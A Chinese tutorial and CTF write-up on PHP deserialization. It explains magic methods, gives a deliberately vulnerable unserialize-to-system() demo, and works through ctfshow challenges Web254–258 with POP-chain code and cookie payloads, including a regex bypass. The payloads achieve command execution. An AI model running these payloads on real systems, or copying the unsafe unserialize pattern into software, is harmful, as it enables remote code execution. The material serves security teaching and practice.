Day60:WEB攻防-PHP反序列化&POP链构造&魔术方法流程&漏洞触发条件&属性修改

这篇具有很好参考价值的文章主要介绍了Day60:WEB攻防-PHP反序列化&POP链构造&魔术方法流程&漏洞触发条件&属性修改。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

PHP-DEMO1-序列化和反序列化

序列化操作 - 即类型转换

序列化案例

PHP-DEMO2-魔术方法触发规则

__construct(): //当对象new的时候会自动调用

__destruct()://当对象被销毁时会被自动调用

__sleep(): //serialize()执行时被自动调用

__wakeup(): //unserialize()时会被自动调用

__invoke(): //把对象当作函数调用时触发

__toString(): //把对象当作字符串使用时触发

__call(): //调用某个方法,若方法存在,则调用;若不存在,则会去调用__call函数。

__get(): //读取对象属性时,若存在,则返回属性值;若不存在,则会调用__get函数

__set(): //设置对象的属性时,若属性存在,则赋值;若不存在,则调用__set函数。

__isset(): //在不可访问的属性(私有的)上调用isset()或empty()触发(isset和empty是一样的)

__unset(): //在不可访问的属性上使用unset()时触发

PHP-DEMO3-反序列化漏洞产生

PHP-CTFSHOW-POP触发链构造

Web254-对象引用执行逻辑

Web255-反序列化变量修改

Web256-反序列化参数修改

Web257-反序列化参数修改&对象调用逻辑

Web258-反序列化参数修改&对象调用逻辑&正则


知识点:

1、PHP-反序列化-应用&识别&函数

2、PHP-反序列化-魔术方法&触发规则

3、PHP-反序列化-联合漏洞&POP链构造

在实战情况下,是不需要知道这些具体分析的,都是利用工具去扫一些框架爆出的反序列话漏洞直接利用即可。学这些具体分析就是为了以后往漏洞挖掘方向发展或者打CTF比赛及面试会被问。

PHP-DEMO1-序列化和反序列化

序列化的原因:为了解决开发中数据传输和数据解析的一个情况(类似于要发送一个椅子快递,不可能整个椅子打包发送,这是非常不方便的,所以就要对椅子进行序列化处理,让椅子分成很多部分在一起打包发送,到目的后重新组装,也就是反序列化处理)

在PHP中,调用serialize()函数时,会将对象的属性进行序列化,但不会序列化对象的方法(函数)。

  1. 当调用serialize()函数时,它会将对象的属性转换为字符串表示,并存储在序列化的结果中。这样可以将对象保存在文件中、通过网络传输或在不同的请求之间传递。
  2. 然而,对象的方法(函数)不会被序列化。这是因为方法(函数)在PHP中通常是定义在类中,而类是对象的模板。当对象被反序列化时,PHP会根据对象所属的类重新创建对象,并将对象的属性值填充到相应的属性中。方法(函数)则是与类关联的,因此不需要被序列化和存储。
  3. 需要注意的是,当使用反序列化函数unserialize()将序列化的数据还原为对象时,被反序列化的类必须在反序列化之前先定义,否则会出现错误。因此,在进行反序列化操作时,确保对象所属的类已经被定义是非常重要的。

序列化操作 - 即类型转换

PHP & JavaEE & Python(见图)

把对象当函数调用 反序列化,Web攻防,Web安全

序列化:对象转换为数组或字符串等格式  

反序列化:将数组或字符串等格式转换成对象

PHP对象转换为字符串格式

把对象当函数调用 反序列化,Web攻防,Web安全

serialize()     //将对象转换成一个字符串
unserialize()   //将字符串还原成一个对象

序列化案例

代码如下:

<?php
header("Content-type: text/html; charset=utf-8");


class user{
    public $name='xiaodi';
    public $sex='man';
    public $age=31;
}

$demo=new user();

$s=serialize($demo);//序列化

$u=unserialize($s);//反序列化

echo $s.'<br>';

var_dump($u);

对象序列化后的数据:对象转为字符串,便于传输数据

把对象当函数调用 反序列化,Web攻防,Web安全

序列化数据反序列化:字符串格式数据转换为对象

把对象当函数调用 反序列化,Web攻防,Web安全

PHP-DEMO2-魔术方法触发规则

常见的魔术方法:

  • __construct(): //当对象new的时候会自动调用
  • __destruct()://当对象被销毁时会被自动调用
  • __sleep(): //serialize()执行时被自动调用
  • __wakeup(): //unserialize()时会被自动调用
  • __invoke(): //当尝试以调用函数的方法调用一个对象时会被自动调用
  • __toString(): //把类当作字符串使用时触发
  • __call(): //调用某个方法,若方法存在,则调用;若不存在,则会去调用__call函数。
  • __callStatic(): //在静态上下文中调用不可访问的方法时触发
  • __get(): //读取对象属性时,若存在,则返回属性值;若不存在,则会调用__get函数
  • __set(): //设置对象的属性时,若属性存在,则赋值;若不存在,则调用__set函数。
  • __isset(): //在不可访问的属性上调用isset()或empty()触发
  • __unset(): //在不可访问的属性上使用unset()时触发
  • __set_state(),调用var_export()导出类时,此静态方法会被调用
  • __clone(),当对象复制完成时调用
  • __autoload(),尝试加载未定义的类
  • __debugInfo(),打印所需调试信息
     

__construct(): //当对象new的时候会自动调用

__destruct()://当对象被销毁时会被自动调用

代码如下:

<?php
header("Content-type: text/html; charset=utf-8");

//__construct __destruct 魔术方法 创建调用__construct 2种销毁调用__destruct
class Test{
    public $name;
    public $age;
    public $string;
    // __construct:实例化对象时被调用.其作用是拿来初始化一些值。
    public function __construct($name, $age, $string){
        echo "__construct 初始化"."<br>";
    }
    // __destruct:当删除一个对象或对象操作终止时被调用。其最主要的作用是拿来做垃圾回收机制。
    /*
     * 当对象销毁时会调用此方法
     * 一是用户主动销毁对象,二是当程序结束时由引擎自动销毁
     */
    function __destruct(){
       echo "__destruct 类执行完毕"."<br>";
    }
}

// 主动销毁
$test = new Test("xiaodi",31, 'Test String');
// 使用unset函数可以立即释放一个变量的内存,使其成为不可访问和不可用的状态。
unset($test);
echo '第一种执行完毕'.'<br>';
echo '----------------------<br>';

//程序结束自动销毁
$test = new test("xiaodi",31, 'Test String');
echo '第二种执行完毕'.'<br>';


?>

结果如下:

把对象当函数调用 反序列化,Web攻防,Web安全

__sleep(): //serialize()执行时被自动调用

代码如下:

<?php

//__sleep():serialize之前被调用,可以指定要序列化的对象属性。
class Test{
    public $name;
    public $age;
    public $string;

    // __construct:实例化对象时被调用.其作用是拿来初始化一些值。
    public function __construct($name, $age, $string){
        echo "__construct 初始化"."<br>";
        $this->name = $name;
        $this->age = $age;
        $this->string = $string;
    }

    //  __sleep() :serialize之前被调用,可以指定要序列化的对象属性
    public function __sleep(){
        echo "当在类外部使用serialize()时会调用这里的__sleep()方法<br>";
        // 例如指定只需要 name 和 age 进行序列化,必须返回一个数值
        return array('name', 'age','string');
    }
}

$a = new Test("xiaodi",31, 'good teacher');
echo serialize($a);

?>

结果如下:

把对象当函数调用 反序列化,Web攻防,Web安全

__wakeup(): //unserialize()时会被自动调用

代码如下:

<?php

//__wakeup:反序列化恢复对象之前调用该方法
class Test{
    public $sex;
    public $name;
    public $age;

    public function __construct($name, $age, $sex){
        echo "__construct被调用!<br>";
    }

    public function __wakeup(){
        echo "当在类外部使用unserialize()时会调用这里的__wakeup()方法<br>";
    }
}

$person = new Test('xiaodi',31,'男');
$a = serialize($person);
unserialize($a);

?>

结果如下:

把对象当函数调用 反序列化,Web攻防,Web安全

__invoke(): //把对象当作函数调用时触发

代码如下:

<?php

//__INVOKE():将对象当做函数来使用时执行此方法,通常不推荐这样做。
class Test{
    // _invoke():以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用
    public function __invoke($param1, $param2, $param3){
        echo "这是一个对象<br>";
        // var_dump函数是一个用于调试的函数,它将输出给定变量的类型、值和其他相关信息
        var_dump($param1,$param2,$param3);
    }
}

$a  = new Test();
//将对象当做函数调用 触发__invoke魔术方法
$a('xiaodi',31,'男');

?>

结果如下:

把对象当函数调用 反序列化,Web攻防,Web安全

__toString(): //把对象当作字符串使用时触发

代码如下:

<?php 

//__toString():如果一个对象类中存在__toString魔术方法,这个对象类被当做字符串进行处理时,就会触发__toString魔术方法
class Test
{
    public $variable = 'good is string';

    public function good(){
        echo $this->variable . '<br />';
    }

    // 在对象当做字符串的时候会被调用
    public function __toString(){
        return '__toString魔术方法被执行!';
    }
}

$a = new Test();
// 输出对象a就是把a当作字符串输出,触发toString()
echo $a;

?>

结果如下:

把对象当函数调用 反序列化,Web攻防,Web安全

__call(): //调用某个方法,若方法存在,则调用;若不存在,则会去调用__call函数。

代码如下:

<?php

//__CALL 魔术方法 调用某个方法, 若方法存在,则直接调用;若不存在,则会去调用__call函数。
class Test{

    public function good($number,$string){
        echo '存在good方法'.'<br>';
        echo $number.'---------'.$string.'<br>';
    }

    // 当调用类中不存在的方法时,就会调用__call();
    public function __call($method,$args){
        echo '不存在'.$method.'方法'.'<br>';
        var_dump($args);
    }
}

$a = new Test();
$a->good(1,'xiaodisec');
// 不存在xiaodi方法 触发__call魔术方法
$b = new Test();
$b->xiaodi(899,'no');

?>

结果如下:

把对象当函数调用 反序列化,Web攻防,Web安全

__get(): //读取对象属性时,若存在,则返回属性值;若不存在,则会调用__get函数

代码如下:

<?php

//__get() 魔术方法 读取一个对象的属性时,若属性存在,则直接返回属性值;若不存在,则会调用__get函数
class Test {
    public $n=1233234;

    // __get():访问不存在的成员变量时调用
    public function __get($name){
        echo '__get 不存在成员变量'.$name.'<br>';
    }
}

$a = new Test();
// 存在成员变量n,所以不调用__get
echo $a->n;
echo '<br>';
// 不存在成员变量spaceman,所以调用__get
echo $a->xiaodi;

?>

结果如下:

把对象当函数调用 反序列化,Web攻防,Web安全

__set(): //设置对象的属性时,若属性存在,则赋值;若不存在,则调用__set函数。

代码如下:

<?php

//__set()魔术方法 设置一个对象的属性时, 若属性存在,则直接赋值;若不存在,则会调用__set函数。
class Test{
    public $noway=0;

    // __set():设置对象不存在的属性或无法访问(私有)的属性时调用
    /* __set($name, $value)
     * 用来为私有成员属性设置的值
     * 第一个参数为你要为设置值的属性名,第二个参数是要给属性设置的值,没有返回值。
     * */

    public function __set($name,$value){
        echo '__set 不存在成员变量 '.$name.'<br>';
        echo '即将设置的值 '.$value."<br>";
        $this->noway=$value;
    }

    public function Get(){
        echo $this->noway;
    }
}

$a = new Test();
// 访问noway属性时调用,并设置值为899
$a->noway  = 123;
// 经过__set方法的设置noway的值为899
$a->Get();
echo '<br>';
// 设置对象不存在的属性xiaodi
$a->xiaodi = 31;
// 经过__set方法的设置noway的值为31
$a->Get();

?>

结果如下:

把对象当函数调用 反序列化,Web攻防,Web安全

__isset(): //在不可访问的属性(私有的)上调用isset()或empty()触发(isset和empty是一样的)

代码如下:

<?php

//__isset(): 检测对象的某个属性是否存在时执行此函数。当对不可访问属性调用 isset() 或 empty() 时,__isset() 会被调用
class Person{
    public $sex; //公共的
    private $name; //私有的
    private $age; //私有的

    public function __construct($name, $age, $sex){
        $this->name = $name;
        $this->age = $age;
        $this->sex = $sex;
    }

    // __isset():当对不可访问属性调用 isset() 或 empty() 时,__isset() 会被调用。
    public function __isset($content){
        echo "当在类外部使用isset()函数测定私有成员 {$content} 时,自动调用<br>";
        echo "123<br>";
        return isset($this->$content);
    }
}

$person = new Person("xiaodi", 31,'男');
// public 成员
echo ($person->sex),"<br>";
// isset函数用于检测一个变量是否已经设置并且不为null。
echo isset($person->name),"<br>";  // 输出为123,1
echo empty($person->sex),"<br>"; //访问public,不会触发-isset()
// private 成员
echo isset($person->name),"<br>";
echo empty($person->age),"<br>";

?>

结果如下:

把对象当函数调用 反序列化,Web攻防,Web安全

__unset(): //在不可访问的属性上使用unset()时触发

代码如下:

<?php

//__unset():在不可访问的属性上使用unset()时触发 销毁对象的某个属性时执行此函数
class Person{
    public $sex;
    private $name;
    private $age;

    public function __construct($name, $age, $sex){
        $this->name = $name;
        $this->age = $age;
        $this->sex = $sex;
    }

    // __unset():销毁对象的某个属性时执行此函数
    public function __unset($content) {
        echo "当在类外部使用unset()函数来删除私有成员 {$content} 时自动调用的<br>";
        //echo isset($this->$content)."<br>";
    }
}

$person = new Person("xiaodi", 31,"男"); // 初始赋值
unset($person->sex);//不调用 属性共有
unset($person->name);//调用 属性私有 触发__unset
unset($person->age);//调用 属性私有 触发__unset

?>

结果如下:

把对象当函数调用 反序列化,Web攻防,Web安全

总代码如下:

<?php
header("Content-type: text/html; charset=utf-8");

__construct __destruct 魔术方法 创建调用__construct 2种销毁调用__destruct
//class Test{
//    public $name;
//    public $age;
//    public $string;
//    // __construct:实例化对象时被调用.其作用是拿来初始化一些值。
//    public function __construct($name, $age, $string){
//        echo "__construct 初始化"."<br>";
//    }
//    // __destruct:当删除一个对象或对象操作终止时被调用。其最主要的作用是拿来做垃圾回收机制。
//    /*
//     * 当对象销毁时会调用此方法
//     * 一是用户主动销毁对象,二是当程序结束时由引擎自动销毁
//     */
//    function __destruct(){
//       echo "__destruct 类执行完毕"."<br>";
//    }
//}
//
 主动销毁
//$test = new Test("xiaodi",31, 'Test String');
 使用unset函数可以立即释放一个变量的内存,使其成为不可访问和不可用的状态。
//unset($test);
//echo '第一种执行完毕'.'<br>';
//echo '----------------------<br>';
//
程序结束自动销毁
//$test = new test("xiaodi",31, 'Test String');
//echo '第二种执行完毕'.'<br>';

__sleep():serialize之前被调用,可以指定要序列化的对象属性。
//class Test{
//    public $name;
//    public $age;
//    public $string;
//
//    // __construct:实例化对象时被调用.其作用是拿来初始化一些值。
//    public function __construct($name, $age, $string){
//        echo "__construct 初始化"."<br>";
//        $this->name = $name;
//        $this->age = $age;
//        $this->string = $string;
//    }
//
//    //  __sleep() :serialize之前被调用,可以指定要序列化的对象属性
//    public function __sleep(){
//        echo "当在类外部使用serialize()时会调用这里的__sleep()方法<br>";
//        // 例如指定只需要 name 和 age 进行序列化,必须返回一个数值
//        return array('name', 'age','string');
//    }
//}
//
//$a = new Test("xiaodi",31, 'good teacher');
//echo serialize($a);


__wakeup:反序列化恢复对象之前调用该方法
//class Test{
//    public $sex;
//    public $name;
//    public $age;
//
//    public function __construct($name, $age, $sex){
//        echo "__construct被调用!<br>";
//    }
//
//    public function __wakeup(){
//        echo "当在类外部使用unserialize()时会调用这里的__wakeup()方法<br>";
//    }
//}
//
//$person = new Test('xiaodi',31,'男');
//$a = serialize($person);
//unserialize($a);


__INVOKE():将对象当做函数来使用时执行此方法,通常不推荐这样做。
//class Test{
//    // _invoke():以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用
//    public function __invoke($param1, $param2, $param3){
//        echo "这是一个对象<br>";
//        // var_dump函数是一个用于调试的函数,它将输出给定变量的类型、值和其他相关信息
//        var_dump($param1,$param2,$param3);
//    }
//}
//
//$a  = new Test();
将对象当做函数调用 触发__invoke魔术方法
//$a('xiaodi',31,'男');


__toString():如果一个对象类中存在__toString魔术方法,这个对象类被当做字符串进行处理时,就会触发__toString魔术方法
//class Test
//{
//    public $variable = 'good is string';
//
//    public function good(){
//        echo $this->variable . '<br />';
//    }
//
//    // 在对象当做字符串的时候会被调用
//    public function __toString(){
//        return '__toString魔术方法被执行!';
//    }
//}
//
//$a = new Test();
 输出对象a就是把a当作字符串输出,触发toString()
//echo $a;


__CALL 魔术方法 调用某个方法, 若方法存在,则直接调用;若不存在,则会去调用__call函数。
//class Test{
//
//    public function good($number,$string){
//        echo '存在good方法'.'<br>';
//        echo $number.'---------'.$string.'<br>';
//    }
//
//    // 当调用类中不存在的方法时,就会调用__call();
//    public function __call($method,$args){
//        echo '不存在'.$method.'方法'.'<br>';
//        var_dump($args);
//    }
//}
//
//$a = new Test();
//$a->good(1,'xiaodisec');
 不存在xiaodi方法 触发__call魔术方法
//$b = new Test();
//$b->xiaodi(899,'no');



__get() 魔术方法 读取一个对象的属性时,若属性存在,则直接返回属性值;若不存在,则会调用__get函数
//class Test {
//    public $n=1233234;
//
//    // __get():访问不存在的成员变量时调用
//    public function __get($name){
//        echo '__get 不存在成员变量'.$name.'<br>';
//    }
//}
//
//$a = new Test();
 存在成员变量n,所以不调用__get
//echo $a->n;
//echo '<br>';
 不存在成员变量spaceman,所以调用__get
//echo $a->xiaodi;


__set()魔术方法 设置一个对象的属性时, 若属性存在,则直接赋值;若不存在,则会调用__set函数。
//class Test{
//    public $noway=0;
//
//    // __set():设置对象不存在的属性或无法访问(私有)的属性时调用
//    /* __set($name, $value)
//     * 用来为私有成员属性设置的值
//     * 第一个参数为你要为设置值的属性名,第二个参数是要给属性设置的值,没有返回值。
//     * */
//
//    public function __set($name,$value){
//        echo '__set 不存在成员变量 '.$name.'<br>';
//        echo '即将设置的值 '.$value."<br>";
//        $this->noway=$value;
//    }
//
//    public function Get(){
//        echo $this->noway;
//    }
//}
//
//$a = new Test();
 访问noway属性时调用,并设置值为899
//$a->noway  = 123;
 经过__set方法的设置noway的值为899
//$a->Get();
//echo '<br>';
 设置对象不存在的属性xiaodi
//$a->xiaodi = 31;
 经过__set方法的设置noway的值为31
//$a->Get();



__isset(): 检测对象的某个属性是否存在时执行此函数。当对不可访问属性调用 isset() 或 empty() 时,__isset() 会被调用
//class Person{
//    public $sex; //公共的
//    private $name; //私有的
//    private $age; //私有的
//
//    public function __construct($name, $age, $sex){
//        $this->name = $name;
//        $this->age = $age;
//        $this->sex = $sex;
//    }
//
//    // __isset():当对不可访问属性调用 isset() 或 empty() 时,__isset() 会被调用。
//    public function __isset($content){
//        echo "当在类外部使用isset()函数测定私有成员 {$content} 时,自动调用<br>";
//        echo "123<br>";
//        return isset($this->$content);
//    }
//}
//
//$person = new Person("xiaodi", 31,'男');
 public 成员
//echo ($person->sex),"<br>";
 isset函数用于检测一个变量是否已经设置并且不为null。
//echo isset($person->name),"<br>";  // 输出为123,1
//echo empty($person->sex),"<br>"; //访问public,不会触发-isset()
 private 成员
//echo isset($person->name),"<br>";
//echo empty($person->age),"<br>";


__unset():在不可访问的属性上使用unset()时触发 销毁对象的某个属性时执行此函数
//class Person{
//    public $sex;
//    private $name;
//    private $age;
//
//    public function __construct($name, $age, $sex){
//        $this->name = $name;
//        $this->age = $age;
//        $this->sex = $sex;
//    }
//
//    // __unset():销毁对象的某个属性时执行此函数
//    public function __unset($content) {
//        echo "当在类外部使用unset()函数来删除私有成员 {$content} 时自动调用的<br>";
//        //echo isset($this->$content)."<br>";
//    }
//}
//
//$person = new Person("xiaodi", 31,"男"); // 初始赋值
//unset($person->sex);//不调用 属性共有
//unset($person->name);//调用 属性私有 触发__unset
//unset($person->age);//调用 属性私有 触发__unset






?>

PHP-DEMO3-反序列化漏洞产生

漏洞原理:

  • 未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。
  • 在反序列化的过程中自动触发了某些魔术方法。
  • 当进行反序列化的时候就有可能会触发对象中的一些魔术方法。

测试代码:

<?php

class B{
    public $cmd='ipconfig';
    public function __destruct(){
        system($this->cmd);
    }
}
//函数引用,无对象创建触发魔术方法
unserialize($_GET['x']);

?>

构造POP链,在构造对象时,只需要考虑成员属性(变量)即可

<?php

class B{
    public $cmd = 'ver';
    }

$x = new B();
echo serialize($x);

?>

把对象当函数调用 反序列化,Web攻防,Web安全

利用paylaod:?x=O:1:"B":1:{s:3:"cmd";s:3:"ver";}

把对象当函数调用 反序列化,Web攻防,Web安全

也可以跟换别的命令:

把对象当函数调用 反序列化,Web攻防,Web安全

总体代码如下:

<?php
class B{
    public $cmd='ipconfig';
    public function __destruct(){  // 对象销毁调用,即该脚本<?php执行结束时,触发
        system($this->cmd);
    }
}
//函数引用,无对象创建触发魔术方法
unserialize($_GET['x']);


//?x=O:1:"B":0:{}
//?x=O:1:"B":1:{s:3:"cmd";s:3:"ver";}

//POP链构造

//class B{
//    public $cmd = 'ver';  // 值我们自己规定,序列化后就是我们的值
//    }
//
//$x = new B();
//echo serialize($x);

//?x=O:1:"B":0:{}
//?x=O:1:"B":1:{s:3:"cmd";s:3:"ver";}

?>

PHP-CTFSHOW-POP触发链构造

POP:面向属性编程(Property-Oriented Programing)常用于上层语言构造特定调用链的方法,序列化攻击都在PHP魔术方法中出现可利用的漏洞,因自动调用触发漏洞,但如关键代码没在魔术方法中,而是在一个类的普通方法中。这时候就可以通过构造POP链寻找相同的函数名将类的属性和敏感函数的属性联系起来。

反序列化常见起点:

把对象当函数调用 反序列化,Web攻防,Web安全

反序列化常见跳板:

把对象当函数调用 反序列化,Web攻防,Web安全

反序列化常见重点:

把对象当函数调用 反序列化,Web攻防,Web安全

pop链构造核心:代码中有用的留下,没用的删掉

Web254-对象引用执行逻辑

把对象当函数调用 反序列化,Web攻防,Web安全

payload:username=xxxxxx&password=xxxxxx

把对象当函数调用 反序列化,Web攻防,Web安全

Web255-反序列化变量修改

PHP在线执行:https://www.bejson.com/runcode/php/

把对象当函数调用 反序列化,Web攻防,Web安全

根据验证逻辑,使用正确账号密码,序列化对象ctfShowUser , isvip = True;

// POP链CODE:
// 1、不修改代码的用户密码
<?php
class ctfShowUser{
    public $isVip=true;
}
$a=new ctfShowUser();
echo urlencode(serialize($a));
?>

生成对象的反序列化

O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

URL解码一下:

O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}

把对象当函数调用 反序列化,Web攻防,Web安全

再login()验证逻辑中,username,password 是从Get请求中提取的值与对象里的值做比对

POP链CODE:
2、修改代码的用户密码
<?php
class ctfShowUser{
    public $username='test';
    public $password='test123';
    public $isVip=true;
}
$a=new ctfShowUser();
echo urlencode(serialize($a));
?>

Get:username=test&password=test123

Cookie:user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22test%22%3Bs%3A8%3A%22password%22%3Bs%3A7%3A%22test123%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

URL解码:

O:11:"ctfShowUser":3:{s:8:"username";s:4:"test";s:8:"password";s:7:"test123";s:5:"isVip";b:1;}

把对象当函数调用 反序列化,Web攻防,Web安全

补充一下:

  • error_reporting(0):这是一个PHP错误报告级别设置的语句。通过将参数设置为0,即禁用错误报告,PHP将不会显示任何错误信息。这在某些情况下可能是有用的,例如在生产环境中隐藏敏感信息或减少不必要的输出。
  • highlight_file(__FILE__):这是一个PHP函数调用,用于将当前文件的源代码以语法高亮的形式输出到浏览器。__FILE__ 是一个魔术常量,表示当前所执行的文件的绝对路径。highlight_file() 函数将读取该文件的内容,并使用颜色突出显示代码的不同部分,以增强可读性。

Web256-反序列化参数修改

把对象当函数调用 反序列化,Web攻防,Web安全

POP链CODE:
<?php
class ctfShowUser{
    public $username='test';
    public $password='test1';
    public $isVip=true;
}
$a=new ctfShowUser();
echo urlencode(serialize($a));
?>

GET:username=test&password=test1

COOKIE:user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22test%22%3Bs%3A8%3A%22password%22%3Bs%3A5%3A%22test1%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

把对象当函数调用 反序列化,Web攻防,Web安全

Web257-反序列化参数修改&对象调用逻辑

把对象当函数调用 反序列化,Web攻防,Web安全

思路:敏锐发现 backDoor.getInfo() 由RCE,但是验证逻辑无法调用,观察到魔术方法 __destruct() 可以调用 getInfo() 函数。

当我们说PHP是一种弱类型语言时,意味着PHP在变量的类型上相对灵活,不需要在声明变量时显式指定其类型。以下是关于PHP弱类型的一些特点:

  1. 隐式类型转换:PHP可以自动进行类型转换,例如将字符串自动转换为数值类型,或将布尔值自动转换为整数。这样的隐式类型转换可以在一定程度上简化代码,但也可能导致意外的结果。
  2. 动态类型:PHP变量的类型可以在运行时根据赋值操作而改变。例如,一个变量可以先存储一个整数值,然后再存储一个字符串值,而无需显式声明类型。
  3. 弱类型比较:在PHP中,可以进行不同类型之间的比较操作,例如将一个字符串与一个整数进行比较。这种比较会自动进行类型转换,根据具体情况确定比较结果。
  4. 隐式类型转换的注意事项:尽管弱类型可以带来便利,但也需要注意一些潜在的问题。隐式的类型转换可能导致错误或意外的结果,尤其是在处理复杂的逻辑和算术运算时。

也就是说类里的数据类型不是严格的,那么可以构造 backDoor 类对象作为 ctfshowUser 的成员变量,当代码逻辑执行完后,销毁 ctfShowUser 后就会调用到 backDoor.getInfo()方法。

// POP链CODE:
<?php
class ctfShowUser{
    public $class = 'backDoor';
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    public $code='system("tac flag.php");';
    
}
echo urlencode(serialize(new ctfShowUser));
?>

序列化数据:

O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A23%3A%22system%28%22tac+flag.php%22%29%3B%22%3B%7D%7D

URL解码

O:11:"ctfShowUser":1:{s:5:"class";O:8:"backDoor":1:{s:4:"code";s:23:"system("tac flag.php");";}}

把对象当函数调用 反序列化,Web攻防,Web安全

Web258-反序列化参数修改&对象调用逻辑&正则

把对象当函数调用 反序列化,Web攻防,Web安全

把对象当函数调用 反序列化,Web攻防,Web安全

把对象当函数调用 反序列化,Web攻防,Web安全

// POP链CODE:
<?php
class ctfShowUser{
    public $class = 'backDoor';
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    public $code="system('tac flag.php');";
}
$a=serialize(new ctfShowUser());
$b=str_replace(':11',':+11',$a);
$c=str_replace(':8',':+8',$b);
echo urlencode($c);
?>

把对象当函数调用 反序列化,Web攻防,Web安全

GET:username=123&password=123

COOKIE:user=O%3A%2B11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A23%3A%22system%28%27tac+flag.php%27%29%3B%22%3B%7D%7D

把对象当函数调用 反序列化,Web攻防,Web安全文章来源地址https://www.toymoban.com/news/detail-859478.html

到了这里,关于Day60:WEB攻防-PHP反序列化&POP链构造&魔术方法流程&漏洞触发条件&属性修改的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 38-WEB漏洞-反序列化之PHP&JAVA全解(下)

    序列化(Serialization):将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。 反序列化:从存储区中读取该数据,并将其还原为对象的过程,成为反序列化。 1、主函数: 调用序列化方法 将反序列化的的结果

    2024年01月25日
    浏览(48)
  • 37-WEB漏洞-反序列化之PHP&JAVA全解(上)

    未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL 注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。 2.1.1、本地 unserialize2.php flag.

    2024年01月22日
    浏览(44)
  • 反序列化渗透与攻防(二)之Java反序列化漏洞

    JAVA反序列化漏洞到底是如何产生的? 1、由于很多站点或者RMI仓库等接口处存在java的反序列化功能,于是攻击者可以通过构造特定的恶意对象序列化后的流,让目标反序列化,从而达到自己的恶意预期行为,包括命令执行,甚至 getshell 等等。 2、Apache Commons Collections是开源小

    2023年04月17日
    浏览(49)
  • 反序列化渗透与攻防(三)之Apache Commons Collections反序列化漏洞

    项目地址:Collections – Download Apache Commons Collections 本地复现环境: jdk 1.7.0_80 IDEA Project Structrure——Projrct设置成1.7 IDEA Project Structrure——Moudles设置成1.7 Settings——Build,Execution,Deployment——Compiler——Java Compiler——Target bytecode version设置成7 Apache Commons Collections ≤ 3.2.1 Apache Com

    2023年04月21日
    浏览(68)
  • Android 反序列化漏洞攻防史话

    Java 在历史上出现过许多反序列化的漏洞,但大部分出自 J2EE 的组件。即便是 FastJSON 这种漏洞,似乎也很少看到在 Android 中被实际的触发和利用。本文即为对历史上曾出现过的 Android Java 反序列化漏洞的分析和研究记录。 序列化和反序列化是指将内存数据结构转换为字节流,

    2024年02月03日
    浏览(42)
  • 【精选】PHP&java 序列化和反序列化漏洞

    目录 首先 其次 技巧和方法

    2024年01月23日
    浏览(52)
  • Java反序列化和PHP反序列化的区别

    反序列化存在的意义是为了数据传输,类是无法直接进行传输的。通过序列化后转换为字符串格式或者JSON格式进行传输 。 序列化与反序列化 seriallization 序列化 : 将对象转化为便于传输的格式, 常见的序列化格式:二进制格式,字节数组,json字符串,xml字符串。 deseriall

    2024年02月07日
    浏览(39)
  • 反序列化漏洞(PHP)

    0x01. 序列化和反序列化是什么 序列化:变量转换为可保存或传输的字符串的过程; 反序列化:把序列化的字符串再转化成原来的变量使用 作用:可轻松地存储和传输数据,使程序更具维护性 0x02. 为什么会有序列化 序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型

    2024年02月06日
    浏览(48)
  • 基于PHP反序列化练习

     PHP创建一个以自己姓名命名的类,要求存在两个属性,name,age,进行序列化,输出序列化以后的数据。 序列化后数据: 手动修改序列化后的数据实现age年龄+100,输出反序列化后的内容:

    2024年01月23日
    浏览(64)
  • php反序列化漏洞基础

            序列化是将对象或类转换为字符串的过程 ,以便在程序运行过程中对其进行持久化存储或传输的操作。在PHP中,序列化主要用于将类对象或数组转换成字节流的形式,以便于存储在磁盘或传输到其他系统。         通过 序列化,可以将对象或类转换成一串字

    2024年01月20日
    浏览(64)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包